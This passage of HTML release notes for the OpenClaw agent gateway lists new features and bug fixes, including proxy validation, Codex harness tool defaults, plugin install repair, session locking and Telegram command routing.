<li>CLI/proxy: add <code>openclaw proxy validate</code> so operators can verify effective proxy configuration, proxy reachability, and expected allow/deny destination behavior before deploying proxy-routed OpenClaw commands. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341892839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73438" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73438/hovercard" href="https://github.com/openclaw/openclaw/pull/73438">#73438</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>Agents/Codex: default Codex app-server dynamic tools to native-first, keeping OpenClaw integration tools while leaving file, patch, exec, and process ownership to the Codex harness; default Codex-harness direct source replies to the OpenClaw <code>message</code> tool when visible reply delivery is not explicitly configured, keeping channel-visible output as a deliberate tool call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361939028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75308" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75308/hovercard" href="https://github.com/openclaw/openclaw/pull/75308">#75308</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Heartbeats/agents: add a structured <code>heartbeat_respond</code> tool for tool-capable heartbeat runs so agents can record quiet outcomes or explicit notification text without relying only on <code>HEARTBEAT_OK</code> parsing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Gateway/config: allow <code>$include</code> directives to read files from operator-approved <code>OPENCLAW_INCLUDE_ROOTS</code> directories while preserving default config-directory confinement. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ificator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ificator">@ificator</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents/OpenAI: default GPT-5 API-key sessions to the SSE Responses transport unless WebSocket is explicitly selected, restoring replies in fresh Control UI and WebChat beta installs where the auto WebSocket path connected but produced no model events.</li>
<li>Agents/sessions: preserve terminal lifecycle state when final run metadata persists from a stale in-memory snapshot, preventing sessions from staying stuck as running after completed or timed-out turns.</li>
<li>Gateway/CLI/status: make <code>openclaw gateway start</code> repair stale managed service definitions that point at old OpenClaw versions, missing binaries, or temporary installer paths before starting; add concrete service, config, listener-owner, and log collection next steps when gateway probes fail and Bonjour finds no local gateway; avoid repeated plugin tool descriptor config hashing so large runtime configs do not block reply startup and trigger reconnect/timeouts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4088411746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49012" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49012/hovercard" href="https://github.com/openclaw/openclaw/issues/49012">#49012</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367851232" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75944" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75944/hovercard" href="https://github.com/openclaw/openclaw/issues/75944">#75944</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Plugins/update/config: stop treating the non-plugin <code>auth</code> command root as a bundled plugin id, keep packaged upgrades and beta external plugin installs on stable runtime aliases and matching prerelease npm specs, detect tracked plugin install records whose package directories disappeared during <code>openclaw update</code>, reinstall them before normal plugin updates, fail the update if install records still point at missing disk payloads, and validate configured web-search providers plus statically suppressed model/provider pairs against the active plugin set at config load. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex/app-server: resolve managed binaries from bundled <code>dist</code> chunks and from the <code>@openai/codex</code> package bin when installs do not provide a nearby <code>.bin/codex</code> shim, avoiding false missing-binary startup failures.</li>
<li>Status: show the <code>openai-codex</code> OAuth profile for <code>openai/gpt-*</code> sessions running through the native Codex runtime instead of reporting auth as unknown. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369662899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76197" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76197/hovercard" href="https://github.com/openclaw/openclaw/pull/76197">#76197</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Status/update: resolve beta update-channel checks from the installed version when config still says <code>stable</code>, show configured channels in <code>openclaw status</code> and config-only <code>openclaw channels status</code> output even when the Gateway is unreachable, and let <code>status --deep</code> reuse live gateway channel credential state instead of warning on command-path-only token misses. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/externalization: add official npm-first catalogs for externalized channel, provider, and generic plugins; install official external web-search plugins before saving provider config; repair missing configured, selected-search, and env-selected plugin installs from npm by default; keep official install docs, update examples, live Codex checks, diagnostics ClawHub packages, and persisted bundled-plugin relocation on default npm tags; and keep ACPX, Google Chat, and LINE publishable plugin dist trees out of the core package while ClawHub pack files roll out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/ClawHub/source/registry: use the ClawHub artifact resolver response as the install decision before downloading, keep bare plugin package specs on npm for the launch cutover and reserve ClawHub resolution for explicit <code>clawhub:</code> specs until ClawHub pack readiness is deployed, discover source-only plugins such as Codex from <code>extensions/*</code>, install ClawPack artifacts from the explicit npm-pack <code>.tgz</code> resolver path, persist artifact kind, npm integrity, shasum, and tarball metadata for update/diagnostics flows, fall back to version metadata when the artifact resolver route is missing, keep the Docker ClawHub fixture aligned with npm-pack artifact resolution, explain unavailable explicit ClawHub ClawPack artifact downloads with a temporary npm install hint, and hash manifest/package metadata when validating persisted plugin registries so fast same-size rewrites cannot leave stale plugin metadata trusted. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Control UI: add validated <code>gateway.controlUi.chatMessageMaxWidth</code> instead of patched bundled CSS, ignore malformed persisted cron rows before they enter UI state, guard stale cron render paths, and bound the default Sessions tab query to recent activity and fewer rows while keeping filters editable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279800285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67935" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67935/hovercard" href="https://github.com/openclaw/openclaw/issues/67935">#67935</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141837644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55047" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55047/hovercard" href="https://github.com/openclaw/openclaw/issues/55047">#55047</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134780011" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54439" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54439/hovercard" href="https://github.com/openclaw/openclaw/issues/54439">#54439</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76050/hovercard" href="https://github.com/openclaw/openclaw/issues/76050">#76050</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136558129" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54550" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54550/hovercard" href="https://github.com/openclaw/openclaw/pull/54550">#54550</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136644421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54552/hovercard" href="https://github.com/openclaw/openclaw/pull/54552">#54552</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76051" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76051/hovercard" href="https://github.com/openclaw/openclaw/pull/76051">#76051</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiew4589-lang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiew4589-lang">@xiew4589-lang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Neomail2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Neomail2">@Neomail2</a>.</li>
<li>Gateway/channels: cap startup fanout at four channel/account handoffs and recover from Bonjour ciao self-probe races, reducing Windows startup stalls with many Telegram accounts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364841887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75687/hovercard" href="https://github.com/openclaw/openclaw/issues/75687">#75687</a>.</li>
<li>Gateway/sessions: keep <code>sessions.list</code> polling responsive on large session stores by reusing list-safe session cache/indexes and returning a lightweight compaction checkpoint preview instead of heavyweight summaries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolandrscheel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolandrscheel">@rolandrscheel</a>.</li>
<li>Control UI/Gateway: keep long-running dashboard WebSocket sessions alive with protocol pings, keep Stop available after reconnect or reload by recovering session-scoped active-run abort state, contain standalone iOS PWA viewports with safe-area-aware document locking, use high-contrast text selection colors, and show inline feedback when local slash-command dispatch is unavailable or fails unexpectedly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321259716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70991" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70991/hovercard" href="https://github.com/openclaw/openclaw/issues/70991">#70991</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204728608" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60850/hovercard" href="https://github.com/openclaw/openclaw/issues/60850">#60850</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115024686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52105" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52105/hovercard" href="https://github.com/openclaw/openclaw/issues/52105">#52105</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204759217" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60854" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60854/hovercard" href="https://github.com/openclaw/openclaw/pull/60854">#60854</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kvncrw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kvncrw">@kvncrw</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Badschaff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Badschaff">@Badschaff</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MooreQiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MooreQiao">@MooreQiao</a>.</li>
<li>CLI/update: treat inherited Gateway service markers as origin hints and only block package replacement when the managed Gateway is still live, so self-updates can stop the service and continue safely. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365329462" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75729" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75729/hovercard" href="https://github.com/openclaw/openclaw/pull/75729">#75729</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hxy91819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hxy91819">@hxy91819</a>.</li>
<li>Agents/failover: exempt run-level timeouts that fire during tool execution from model fallback, timeout-triggered compaction, and generic timeout payload synthesis, avoiding misleading "LLM request timed out" errors after the primary model has already responded. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115327379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52147" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52147/hovercard" href="https://github.com/openclaw/openclaw/issues/52147">#52147</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367303713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75873/hovercard" href="https://github.com/openclaw/openclaw/pull/75873">#75873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonusa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonusa">@simonusa</a>.</li>
<li>Docker: copy Bun 1.3.13 from a digest-pinned image and keep CI on the same version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350919036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74356" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74356/hovercard" href="https://github.com/openclaw/openclaw/issues/74356">#74356</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</li>
<li>Agents/compaction: keep prior context on consecutive turns against z.ai-style providers (z.ai direct, openrouter z-ai/*, in-house GLM gateways), avoiding accidental Pi state reset after successful turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368789014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76056/hovercard" href="https://github.com/openclaw/openclaw/pull/76056">#76056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Doctor/plugins: run a one-time 2026.5.2 configured-plugin install repair based on <code>meta.lastTouchedVersion</code>, update stale configured plugin manifests that still declare channels without <code>channelConfigs</code>, install actively used downloadable OpenClaw plugins through the configured external source, preserve unmanaged third-party plugin <code>node_modules</code>, and then mark the config touched for the release.</li>
<li>Sessions/transcripts: use one <code>session.writeLock.acquireTimeoutMs</code> policy for session transcript lock acquisitions and raise the default wait to 60 seconds, avoiding user-visible lock timeouts during legitimate slow prep, cleanup, compaction, and mirror work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529883" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75894" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75894/hovercard" href="https://github.com/openclaw/openclaw/issues/75894">#75894</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shandutta/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shandutta">@shandutta</a>.</li>
<li>Agents/restart recovery: match cleaned transcript locks by exact transcript lock paths plus the canonical session fallback, so interrupted main sessions using topic-suffixed transcripts resume after gateway restart. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368769053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76052" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76052/hovercard" href="https://github.com/openclaw/openclaw/pull/76052">#76052</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>.</li>
<li>Agents/runtime: cache the stable system-prompt prefix and reuse prompt-report tool schema stats during dispatch prep, reducing repeated CPU work before streaming starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368424894" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75999/hovercard" href="https://github.com/openclaw/openclaw/issues/75999">#75999</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368807955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76061" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76061/hovercard" href="https://github.com/openclaw/openclaw/issues/76061">#76061</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zackchiutw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zackchiutw">@zackchiutw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/STLI69/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/STLI69">@STLI69</a>.</li>
<li>Telegram/native commands: pass persisted session files into plugin commands for topic-bound sessions, so <code>/codex bind</code> works from Telegram forum topics. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367067083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75845/hovercard" href="https://github.com/openclaw/openclaw/pull/75845">#75845</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368766599" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76049" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76049/hovercard" href="https://github.com/openclaw/openclaw/pull/76049">#76049</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MatthewSchleder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MatthewSchleder">@MatthewSchleder</a>.</li>
<li>Security audit/plugins: ignore plugin install backup, disabled, and dependency debris directories when enumerating installed plugin roots, avoiding false-positive findings for <code>.openclaw-install-backups</code> after plugin updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363085900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75456/hovercard" href="https://github.com/openclaw/openclaw/issues/75456">#75456</a>.</li>
<li>Telegram: honor runtime conversation bindings for native slash commands in bound top-level groups, so commands like <code>/status@bot</code> route to the active non-<code>main</code> session instead of falling back to the default route. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362659532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75405/hovercard" href="https://github.com/openclaw/openclaw/issues/75405">#75405</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363728120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75558/hovercard" href="https://github.com/openclaw/openclaw/pull/75558">#75558</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ziptbm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ziptbm">@ziptbm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</li>
<li>Gateway/tasks: make task registry maintenance use pass-local backing-session lookups and fresh active child-session indexes, avoiding repeated full task snapshots and session-store clones on large stale registries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342683931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73517/hovercard" href="https://github.com/openclaw/openclaw/issues/73517">#73517</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365145364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75708/hovercard" href="https://github.com/openclaw/openclaw/issues/75708">#75708</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351414705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74406" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74406/hovercard" href="https://github.com/openclaw/openclaw/pull/74406">#74406</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365146597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75709" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75709/hovercard" href="https://github.com/openclaw/openclaw/pull/75709">#75709</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lightningxxl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lightningxxl">@Lightningxxl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/glfruit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/glfruit">@glfruit</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jared-rebel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jared-rebel">@jared-rebel</a>.</li>
<li>Auth/sessions: JSON-clone auth-profile cache/runtime snapshots and remaining session cleanup previews instead of using <code>structuredClone</code>, preserving mutation isolation while avoiding native-memory growth on large stores. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4073238042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45438/hovercard" href="https://github.com/openclaw/openclaw/issues/45438">#45438</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markus-lassfolk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markus-lassfolk">@markus-lassfolk</a>.</li>
<li>Models CLI: restore <code>openclaw models list --provider &lt;id&gt;</code> catalog and registry fallback rows for unconfigured providers, so provider-specific verification commands no longer report "No models found." Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363447158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75517/hovercard" href="https://github.com/openclaw/openclaw/issues/75517">#75517</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364131001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75615" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75615/hovercard" href="https://github.com/openclaw/openclaw/pull/75615">#75615</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lotsoftick/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lotsoftick">@lotsoftick</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</li>
<li>Gateway/macOS: write LaunchAgent services with a canonical system PATH and stop preserving old plist PATH entries, so Volta, asdf, fnm, and pnpm shell paths no longer affect gateway child-process Node resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360722639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75233" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75233/hovercard" href="https://github.com/openclaw/openclaw/issues/75233">#75233</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360954515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75246" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75246/hovercard" href="https://github.com/openclaw/openclaw/pull/75246">#75246</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nphyde2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nphyde2">@nphyde2</a>.</li>
<li>Slack/hooks: preserve bot alert attachment text in message-received hook content when command text is blank. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368641515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76035" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76035/hovercard" href="https://github.com/openclaw/openclaw/issues/76035">#76035</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368643379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76036" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76036/hovercard" href="https://github.com/openclaw/openclaw/pull/76036">#76036</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amsminn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amsminn">@amsminn</a>.</li>
<li>Sessions/agents: route Gateway session-store writes, CLI cleanup maintenance, and agent-delete session purges through a dedicated in-process writer and borrow the validated mutable cache during the writer slot, avoiding runtime file locks plus repeated <code>sessions.json</code> rereads and JSON clones on hot metadata updates. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288028893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68554/hovercard" href="https://github.com/openclaw/openclaw/pull/68554">#68554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/henkterharmsel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/henkterharmsel">@henkterharmsel</a>.</li>
